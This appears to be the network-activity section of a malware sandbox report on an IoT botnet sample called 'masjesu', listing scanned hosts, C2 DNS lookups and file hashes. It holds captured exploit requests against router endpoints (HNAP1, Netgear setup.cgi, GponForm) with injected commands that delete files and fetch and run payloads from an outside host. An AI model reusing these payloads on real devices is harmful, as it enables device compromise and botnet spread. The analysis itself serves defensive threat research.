Date: Sat, 04 Jan 2025 20:09:35 GMT
Connection: close
-
GEThttp://37.98.214.21:80/shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://66.63.187.225/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 37.98.214.21:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 404 Not Found
Connection: Keep-Alive
Transfer-Encoding: chunked
Keep-Alive: timeout=20
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
-
POSThttp://37.98.214.21:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 37.98.214.21:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://66.63.187.225/bins.sh;curl -O http://66.63.187.225/bins.sh;/bin/busybox wget http://66.63.187.225/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 404 Not Found
Connection: close
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
-
GEThttp://37.98.214.21:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://66.63.187.225/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 404 Not Found
Connection: close
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 404 Not Found
Connection: close
Transfer-Encoding: chunked
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
-
66.63.187.225:80http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hhttp
HTTP Request
GET http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hhttp
HTTP Request
GET http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hhttp
HTTP Request
GET http://66.63.187.225/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9hHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWhttp
HTTP Request
GET http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWhttp
HTTP Request
GET http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWhttp
HTTP Request
GET http://66.63.187.225/bins/uaE3TZiRjYaYkzXVdktiBEXomffvBeGBlWHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUochttp
HTTP Request
GET http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUocHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUochttp
HTTP Request
GET http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUocHTTP Response
200 -
66.63.187.225:80http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUochttp
HTTP Request
GET http://66.63.187.225/bins/4q4z3m8k4sdvOOOMh36URHa6bHT8CHbUocHTTP Response
200 -
146.19.162.73:443conn.masjesu.zip -
66.63.187.225:443conn.masjesu.ziphttps
-
66.63.187.225:80http://66.63.187.225/.shellhttp
HTTP Request
GET http://66.63.187.225/.shellHTTP Response
200 -
157.163.252.149:37215 -
218.21.255.32:37215 -
125.122.13.20:37215
-
201.74.35.120:37215 -
96.32.33.82:37215
-
161.180.213.106:37215
-
84.133.144.156:37215
-
42.246.141.28:37215
-
142.123.249.164:37215 -
77.235.190.173:37215
-
34.216.16.101:37215
-
83.42.38.245:37215 -
133.125.191.187:37215 -
168.30.143.210:37215
-
62.21.154.81:37215
-
24.225.255.220:37215
-
176.178.74.243:37215 -
201.64.75.187:37215
-
119.16.163.97:37215
-
169.54.22.241:37215
-
71.126.25.244:37215
-
208.111.40.106:37215
-
78.125.94.161:37215
-
32.14.254.244:37215
-
93.5.98.61:37215
-
116.204.50.59:37215
-
88.168.207.30:37215
-
182.247.55.226:37215
-
90.13.69.214:37215
-
106.237.233.156:37215
-
80.218.20.142:37215 -
58.35.53.82:37215
-
165.12.164.18:37215 -
186.59.105.222:37215 -
156.95.244.28:37215
-
81.23.107.106:37215 -
151.190.245.228:37215
-
102.245.219.5:37215 -
207.119.74.154:37215
-
41.98.210.100:37215 -
3.208.143.192:37215
-
123.42.210.167:37215 -
103.252.187.3:37215 -
83.155.157.190:37215
-
185.189.84.158:37215 -
173.161.103.173:37215
-
156.14.79.35:37215 -
182.68.59.220:37215
-
217.250.84.151:37215
-
112.55.31.11:37215
-
76.219.74.23:37215
-
68.87.112.37:37215
-
73.225.194.155:37215
-
63.237.20.60:37215
-
195.193.252.9:37215
-
213.57.96.144:37215 -
149.140.1.90:37215 -
52.97.146.124:37215 -
37.120.154.219:37215
-
101.218.237.177:37215
-
179.126.142.74:37215
-
176.22.122.125:37215 -
117.155.92.67:37215
-
161.212.244.191:37215 -
108.94.2.159:37215
-
15.81.138.245:37215
-
62.79.12.123:37215
-
87.80.224.101:37215
-
178.232.208.178:37215 -
183.8.206.18:37215
-
177.138.161.42:37215
-
14.61.160.225:37215
-
207.235.152.150:37215
-
97.194.98.187:37215
-
85.162.36.220:37215 -
35.203.61.249:37215
-
47.75.159.242:37215 -
186.59.112.230:37215
-
66.3.135.219:37215
-
1.166.25.163:37215 -
218.21.255.32:80
-
201.64.75.187:80
-
71.126.25.244:80
-
62.21.154.81:80
-
96.32.33.82:80
-
169.54.22.241:80
-
42.246.141.28:80
-
176.178.74.243:80
-
161.180.213.106:80
-
84.133.144.156:80
-
77.235.190.173:80
-
125.122.13.20:80
-
168.30.143.210:80
-
133.125.191.187:80
-
157.163.252.149:80
-
201.74.35.120:80
-
119.16.163.97:80
-
83.42.38.245:80
-
208.111.40.106:80
-
24.225.255.220:80
-
34.216.16.101:80
-
142.123.249.164:80
-
83.155.157.190:80
-
41.98.210.100:80
-
173.161.103.173:80
-
80.218.20.142:80
-
63.237.20.60:80
-
156.14.79.35:80
-
88.168.207.30:80
-
182.247.55.226:80
-
32.14.254.244:80
-
123.42.210.167:80
-
151.190.245.228:80
-
103.252.187.3:80
-
106.237.233.156:80
-
3.208.143.192:80
-
165.12.164.18:80
-
185.189.84.158:80
-
156.95.244.28:80
-
186.59.105.222:80
-
58.35.53.82:80
-
182.68.59.220:80
-
112.55.31.11:80
-
90.13.69.214:80
-
68.87.112.37:80
-
73.225.194.155:80
-
207.119.74.154:80
-
76.219.74.23:80
-
102.245.219.5:80
-
116.204.50.59:80
-
81.23.107.106:80
-
217.250.84.151:80
-
195.193.252.9:80
-
93.5.98.61:80
-
78.125.94.161:80
-
177.138.161.42:80
-
101.218.237.177:80
-
47.75.159.242:80
-
213.57.96.144:80
-
183.8.206.18:80
-
52.97.146.124:80
-
149.140.1.90:80
-
179.126.142.74:80
-
108.94.2.159:80
-
207.235.152.150:80
-
35.203.61.249:80
-
87.80.224.101:80
-
186.59.112.230:80
-
161.212.244.191:80
-
176.22.122.125:80
-
117.155.92.67:80
-
85.162.36.220:80
-
178.232.208.178:80
-
15.81.138.245:80
-
37.120.154.219:80
-
97.194.98.187:80
-
14.61.160.225:80
-
62.79.12.123:80
-
66.3.135.219:80
-
1.166.25.163:80
-
119.16.163.97:81
-
84.133.144.156:81
-
201.64.75.187:81
-
208.111.40.106:81
-
24.225.255.220:81
-
176.178.74.243:81
-
62.21.154.81:81
-
168.30.143.210:81
-
83.42.38.245:81
-
201.74.35.120:81
-
133.125.191.187:81
-
218.21.255.32:81
-
71.126.25.244:81
-
125.122.13.20:81
-
169.54.22.241:81
-
161.180.213.106:81
-
42.246.141.28:81
-
77.235.190.173:81
-
34.216.16.101:81
-
157.163.252.149:81
-
96.32.33.82:81
-
173.161.103.173:81
-
41.98.210.100:81
-
142.123.249.164:81
-
83.155.157.190:81
-
80.218.20.142:81
-
78.125.94.161:81
-
87.80.224.101:81
-
81.23.107.106:81
-
151.190.245.228:81
-
103.252.187.3:81
-
63.237.20.60:81
-
3.208.143.192:81
-
177.138.161.42:81
-
186.59.105.222:81
-
165.12.164.18:81
-
90.13.69.214:81
-
108.94.2.159:81
-
58.35.53.82:81
-
182.247.55.226:81
-
185.189.84.158:81
-
76.219.74.23:81
-
32.14.254.244:81
-
102.245.219.5:81
-
207.235.152.150:81
-
73.225.194.155:81
-
195.193.252.9:81
-
35.203.61.249:81
-
213.57.96.144:81
-
217.250.84.151:81
-
183.8.206.18:81
-
123.42.210.167:81
-
68.87.112.37:81
-
149.140.1.90:81
-
207.119.74.154:81
-
182.68.59.220:81
-
156.14.79.35:81
-
101.218.237.177:81
-
179.126.142.74:81
-
93.5.98.61:81
-
106.237.233.156:81
-
116.204.50.59:81
-
47.75.159.242:81
-
88.168.207.30:81
-
186.59.112.230:81
-
112.55.31.11:81
-
156.95.244.28:81
-
52.97.146.124:81
-
37.120.154.219:81
-
176.22.122.125:81
-
62.79.12.123:81
-
14.61.160.225:81
-
66.3.135.219:81
-
178.232.208.178:81
-
85.162.36.220:81
-
15.81.138.245:81
-
161.212.244.191:81
-
97.194.98.187:81
-
1.166.25.163:81
-
117.155.92.67:81
-
84.133.144.156:8080
-
41.98.210.100:8080
-
207.235.152.150:8080
-
24.225.255.220:8080
-
62.21.154.81:8080
-
71.126.25.244:8080
-
208.111.40.106:8080
-
77.235.190.173:8080
-
168.30.143.210:8080
-
201.64.75.187:8080
-
83.42.38.245:8080
-
176.178.74.243:8080
-
161.180.213.106:8080
-
157.163.252.149:8080
-
218.21.255.32:8080
-
42.246.141.28:8080
-
125.122.13.20:8080
-
169.54.22.241:8080
-
34.216.16.101:8080
-
133.125.191.187:8080
-
119.16.163.97:8080
-
96.32.33.82:8080
-
201.74.35.120:8080
-
83.155.157.190:8080
-
80.218.20.142:8080
-
142.123.249.164:8080
-
173.161.103.173:8080
-
78.125.94.161:8080
-
87.80.224.101:8080
-
165.12.164.18:8080
-
58.35.53.82:8080
-
3.208.143.192:8080
-
102.245.219.5:8080
-
90.13.69.214:8080
-
182.247.55.226:8080
-
35.203.61.249:8080
-
178.232.208.178:8080
-
186.59.105.222:8080
-
62.79.12.123:8080
-
177.138.161.42:8080
-
151.190.245.228:8080
-
32.14.254.244:8080
-
108.94.2.159:8080
-
185.189.84.158:8080
-
103.252.187.3:8080
-
66.3.135.219:8080
-
85.162.36.220:8080
-
149.140.1.90:8080
-
37.120.154.219:8080
-
97.194.98.187:8080
-
195.193.252.9:8080
-
156.14.79.35:8080
-
14.61.160.225:8080
-
1.166.25.163:8080
-
161.212.244.191:8080
-
47.75.159.242:8080
-
182.68.59.220:8080
-
213.57.96.144:8080
-
88.168.207.30:8080
-
207.119.74.154:8080
-
156.95.244.28:8080
-
183.8.206.18:8080
-
52.97.146.124:8080
-
15.81.138.245:8080
-
93.5.98.61:8080
-
112.55.31.11:8080
-
179.126.142.74:8080
-
76.219.74.23:8080
-
63.237.20.60:8080
-
81.23.107.106:8080
-
101.218.237.177:8080
-
116.204.50.59:8080
-
73.225.194.155:8080
-
123.42.210.167:8080
-
106.237.233.156:8080
-
117.155.92.67:8080
-
68.87.112.37:8080
-
176.22.122.125:8080
-
217.250.84.151:8080
-
186.59.112.230:8080
-
84.133.144.156:52869
-
41.98.210.100:52869
-
84.133.144.156:7574
-
207.235.152.150:52869
-
84.133.144.156:5555
-
41.98.210.100:7574
-
125.122.13.20:52869
-
218.21.255.32:52869
-
83.42.38.245:52869
-
42.246.141.28:52869
-
208.111.40.106:52869
-
168.30.143.210:52869
-
201.64.75.187:52869
-
77.235.190.173:52869
-
169.54.22.241:52869
-
157.163.252.149:52869
-
161.180.213.106:52869
-
176.178.74.243:52869
-
34.216.16.101:52869
-
71.126.25.244:52869
-
62.21.154.81:52869
-
24.225.255.220:52869
-
41.98.210.100:5555
-
142.123.249.164:52869
-
80.218.20.142:52869
-
83.155.157.190:52869
-
119.16.163.97:52869
-
201.74.35.120:52869
-
96.32.33.82:52869
-
173.161.103.173:52869
-
133.125.191.187:52869
-
87.80.224.101:52869
-
78.125.94.161:52869
-
77.235.190.173:7574
-
35.203.61.249:52869
-
195.193.252.9:52869
-
76.219.74.23:52869
-
217.250.84.151:52869
-
73.225.194.155:52869
-
85.162.36.220:52869
-
123.42.210.167:52869
-
14.61.160.225:52869
-
47.75.159.242:52869
-
161.212.244.191:52869
-
156.95.244.28:52869
-
66.3.135.219:52869
-
3.208.143.192:52869
-
156.14.79.35:52869
-
117.155.92.67:52869
-
182.68.59.220:52869
-
81.23.107.106:52869
-
112.55.31.11:52869
-
213.57.96.144:52869
-
108.94.2.159:52869
-
183.8.206.18:52869
-
32.14.254.244:52869
-
116.204.50.59:52869
-
90.13.69.214:52869
-
151.190.245.228:52869
-
1.166.25.163:52869
-
93.5.98.61:52869
-
102.245.219.5:52869
-
68.87.112.37:52869
-
103.252.187.3:52869
-
106.237.233.156:52869
-
62.79.12.123:52869
-
186.59.105.222:52869
-
165.12.164.18:52869
-
182.247.55.226:52869
-
149.140.1.90:52869
-
37.120.154.219:52869
-
58.35.53.82:52869
-
63.237.20.60:52869
-
177.138.161.42:52869
-
186.59.112.230:52869
-
207.119.74.154:52869
-
97.194.98.187:52869
-
179.126.142.74:52869
-
178.232.208.178:52869
-
15.81.138.245:52869
-
52.97.146.124:52869
-
101.218.237.177:52869
-
185.189.84.158:52869
-
88.168.207.30:52869
-
176.22.122.125:52869
-
207.235.152.150:7574
-
84.133.144.156:49152
-
84.133.144.156:8443
-
34.216.16.101:7574
-
169.54.22.241:7574
-
218.21.255.32:7574
-
42.246.141.28:7574
-
83.42.38.245:7574
-
201.64.75.187:7574
-
157.163.252.149:7574
-
161.180.213.106:7574
-
125.122.13.20:7574
-
176.178.74.243:7574
-
62.21.154.81:7574
-
208.111.40.106:7574
-
168.30.143.210:7574
-
24.225.255.220:7574
-
71.126.25.244:7574
-
96.32.33.82:7574
-
119.16.163.97:7574
-
80.218.20.142:7574
-
173.161.103.173:7574
-
142.123.249.164:7574
-
133.125.191.187:7574
-
41.98.210.100:49152
-
201.74.35.120:7574
-
83.155.157.190:7574
-
78.125.94.161:7574
-
87.80.224.101:7574
-
77.235.190.173:5555
-
1.166.25.163:7574
-
62.79.12.123:7574
-
66.3.135.219:7574
-
68.87.112.37:7574
-
217.250.84.151:7574
-
178.232.208.178:7574
-
32.14.254.244:7574
-
101.218.237.177:7574
-
156.14.79.35:7574
-
76.219.74.23:7574
-
3.208.143.192:7574
-
165.12.164.18:7574
-
73.225.194.155:7574
-
15.81.138.245:7574
-
116.204.50.59:7574
-
90.13.69.214:7574
-
177.138.161.42:7574
-
103.252.187.3:7574
-
14.61.160.225:7574
-
117.155.92.67:7574
-
97.194.98.187:7574
-
123.42.210.167:7574
-
102.245.219.5:7574
-
195.193.252.9:7574
-
35.203.61.249:7574
-
179.126.142.74:7574
-
58.35.53.82:7574
-
182.68.59.220:7574
-
183.8.206.18:7574
-
37.120.154.219:7574
-
151.190.245.228:7574
-
207.119.74.154:7574
-
156.95.244.28:7574
-
161.212.244.191:7574
-
186.59.112.230:7574
-
112.55.31.11:7574
-
52.97.146.124:7574
-
186.59.105.222:7574
-
85.162.36.220:7574
-
149.140.1.90:7574
-
106.237.233.156:7574
-
88.168.207.30:7574
-
47.75.159.242:7574
-
182.247.55.226:7574
-
213.57.96.144:7574
-
93.5.98.61:7574
-
108.94.2.159:7574
-
176.22.122.125:7574
-
81.23.107.106:7574
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Response
66.63.187.225146.19.162.73
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Response
146.19.162.7366.63.187.225
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD52bc4d1242454bf8979a3c9045d3f7cff
SHA14eadd7b34ee55b528d1b5f15d0af9689cc8cef9d
SHA256afe28aee6a3f7a622d290d8fb896ac07dfff386c4083126efea33b3cc774f96b
SHA51224567644fd73758c8ce158aceffc778b7e69f663ffd2c448308f87106308a626e70fd88748ad61e1a380ed8ec67a9776177d1a66bbf3dc55b55514bbc278d8cf